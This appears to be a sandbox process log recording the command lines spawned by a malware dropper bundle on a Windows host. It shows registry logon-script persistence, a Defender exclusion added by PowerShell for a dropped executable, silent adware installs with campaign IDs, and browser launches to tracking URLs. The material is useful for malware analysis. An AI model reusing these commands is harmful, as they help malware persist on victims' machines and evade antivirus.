C:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 7112 -ip 7112
C:\Users\Admin\AppData\Local\Temp\is-N12DA.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-N12DA.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 7080 -ip 7080
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1300 -s 2324
C:\Users\Admin\Documents\WJwaJXhBwGo9_dvnNCZRBFvv.exe
C:\Users\Admin\Documents\WJwaJXhBwGo9_dvnNCZRBFvv.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 7096 -ip 7096
C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe
"C:\Users\Admin\Documents\57cA8QoO2k9yfbIsbLc4JUjp.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7080 -s 240
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\Documents\rprg2L7hJ3c2hQV9lB20d1Ur.exe
C:\Users\Admin\Documents\rprg2L7hJ3c2hQV9lB20d1Ur.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\Documents\em1B_6scYxoZ74gMl4nvPl6e.exe
"C:\Users\Admin\Documents\em1B_6scYxoZ74gMl4nvPl6e.exe" -q
C:\Users\Admin\AppData\Roaming\6630894.exe
"C:\Users\Admin\AppData\Roaming\6630894.exe"
C:\Users\Admin\AppData\Local\Temp\is-EGNEJ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-EGNEJ.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 1108 -ip 1108
C:\Users\Admin\Documents\re1Hhy31txL4H3hNkEpiD2FT.exe
"C:\Users\Admin\Documents\re1Hhy31txL4H3hNkEpiD2FT.exe"
C:\Users\Admin\AppData\Roaming\7948182.exe
"C:\Users\Admin\AppData\Roaming\7948182.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 296
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 6824 -ip 6824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 7088 -ip 7088
C:\Users\Admin\AppData\Roaming\6500067.exe
"C:\Users\Admin\AppData\Roaming\6500067.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 7132 -ip 7132
C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6R48I.tmp\Setup.tmp" /SL5="$20514,17361482,721408,C:\Users\Admin\AppData\Local\Temp\is-EGNEJ.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\AppData\Roaming\3770032.exe
"C:\Users\Admin\AppData\Roaming\3770032.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 4704 -ip 4704
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6824 -s 296
C:\Users\Admin\AppData\Local\Temp\is-7CLL1.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-7CLL1.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-VOUMJ.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Users\Admin\AppData\Local\Temp\B95A.exe
C:\Users\Admin\AppData\Local\Temp\B95A.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 944
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 7164 -ip 7164
C:\Users\Admin\AppData\Local\Temp\is-FANIM.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FANIM.tmp\Setup.tmp" /SL5="$3056E,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-7CLL1.tmp\Setup.exe" /silent /subid=720
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D914A202CE78B1478DC7C441E676384E C
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7164 -s 272
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-VOUMJ.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding B917B62520F6A96A8050695C65562489 C
C:\Users\Admin\AppData\Local\Temp\E26F.exe
C:\Users\Admin\AppData\Local\Temp\E26F.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 696 -p 5832 -ip 5832
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 7964 -ip 7964
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding D012CEBDEE7A734B345142F4A1F0C333 C
C:\Users\Admin\AppData\Local\Temp\F8E6.exe
C:\Users\Admin\AppData\Local\Temp\F8E6.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 5460 -ip 5460
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5832 -s 2376
C:\Program Files\Uninstall Information\PFWIRKNYFX\ultramediaburner.exe
"C:\Program Files\Uninstall Information\PFWIRKNYFX\ultramediaburner.exe" /VERYSILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 452
C:\Users\Admin\AppData\Local\Temp\is-HITCF.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HITCF.tmp\ultramediaburner.tmp" /SL5="$70216,281924,62464,C:\Program Files\Uninstall Information\PFWIRKNYFX\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\d1-69593-e12-f878d-e017d54fdd784\Bemekiqeve.exe
"C:\Users\Admin\AppData\Local\Temp\d1-69593-e12-f878d-e017d54fdd784\Bemekiqeve.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7964 -s 292
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-552S6.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Users\Admin\AppData\Local\Temp\bb-ab8d1-525-161a0-0ed2c497473b0\Syzhugurope.exe
"C:\Users\Admin\AppData\Local\Temp\bb-ab8d1-525-161a0-0ed2c497473b0\Syzhugurope.exe"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Program Files\Windows Defender\mpcmdrun.exe
"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
C:\Users\Admin\AppData\Local\Temp\248B.exe
C:\Users\Admin\AppData\Local\Temp\248B.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 5448 -ip 5448
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5448 -s 2428
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 26119F7F8AA86AFC9A8AE19F3470B7C5
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Users\Admin\AppData\Local\Temp\is-VOUMJ.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-VOUMJ.tmp\{app}\vdi_compiler"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\Users\Admin\AppData\Local\Temp\3C4A.exe
C:\Users\Admin\AppData\Local\Temp\3C4A.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 576 -p 4540 -ip 4540
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 5072 -ip 5072
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4540 -s 2376
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 292
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Users\Admin\AppData\Local\Temp\8049.exe
C:\Users\Admin\AppData\Local\Temp\8049.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oec0hdxx.xwe\GcleanerEU.exe /eufive & exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\doaekc0v.44j\installer.exe /qn CAMPAIGN="654" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\riverjei.ehz\ufgaa.exe & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2632 /prefetch:8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jkijb0fa.1y2\anyname.exe & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qaqavt3v.h5q\gcleaner.exe /mixfive & exit
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall
C:\Users\Admin\AppData\Local\Temp\doaekc0v.44j\installer.exe
C:\Users\Admin\AppData\Local\Temp\doaekc0v.44j\installer.exe /qn CAMPAIGN="654"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\jkijb0fa.1y2\anyname.exe
C:\Users\Admin\AppData\Local\Temp\jkijb0fa.1y2\anyname.exe
C:\Users\Admin\AppData\Local\Temp\qaqavt3v.h5q\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\qaqavt3v.h5q\gcleaner.exe /mixfive
C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{4e24245b-aaeb-474d-9108-7d3cab84b81a}\oemvista.inf" "9" "4d14a44ff" "000000000000010C" "WinSta0\Default" "0000000000000158" "208" "c:\program files (x86)\maskvpn\driver\win764"
C:\Users\Admin\AppData\Local\Temp\oec0hdxx.xwe\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\oec0hdxx.xwe\GcleanerEU.exe /eufive
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 2736 -ip 2736
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\64f6c8fc-89c3-44ce-83ab-aac08aaa3cb7\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\64f6c8fc-89c3-44ce-83ab-aac08aaa3cb7\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\64f6c8fc-89c3-44ce-83ab-aac08aaa3cb7\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 2448
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oem2.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000154" "c473"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 795913E3A4B04BD2B81FBA97178112E8 C
C:\Users\Admin\AppData\Local\Temp\jkijb0fa.1y2\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\jkijb0fa.1y2\anyname.exe" -q
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\64f6c8fc-89c3-44ce-83ab-aac08aaa3cb7\test.bat"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 18928 -ip 18928
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Users\Admin\AppData\Local\Temp\E53E.exe
C:\Users\Admin\AppData\Local\Temp\E53E.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 17732 -ip 17732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 17664 -ip 17664
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 18928 -s 1600
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 17664 -s 288
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 17732 -s 288
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5712 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5756 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\FABB.exe
C:\Users\Admin\AppData\Local\Temp\FABB.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kvazgmcs.10i\autosubplayer.exe /S & exit
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Users\Admin\AppData\Local\Temp\DF6.exe
C:\Users\Admin\AppData\Local\Temp\DF6.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\8049.exe" -Force
C:\Users\Admin\AppData\Local\Temp\8049.exe
C:\Users\Admin\AppData\Local\Temp\8049.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\doaekc0v.44j\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\doaekc0v.44j\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 20220 -ip 20220
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 20220 -s 296
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\396C.exe
C:\Users\Admin\AppData\Local\Temp\396C.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6104 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
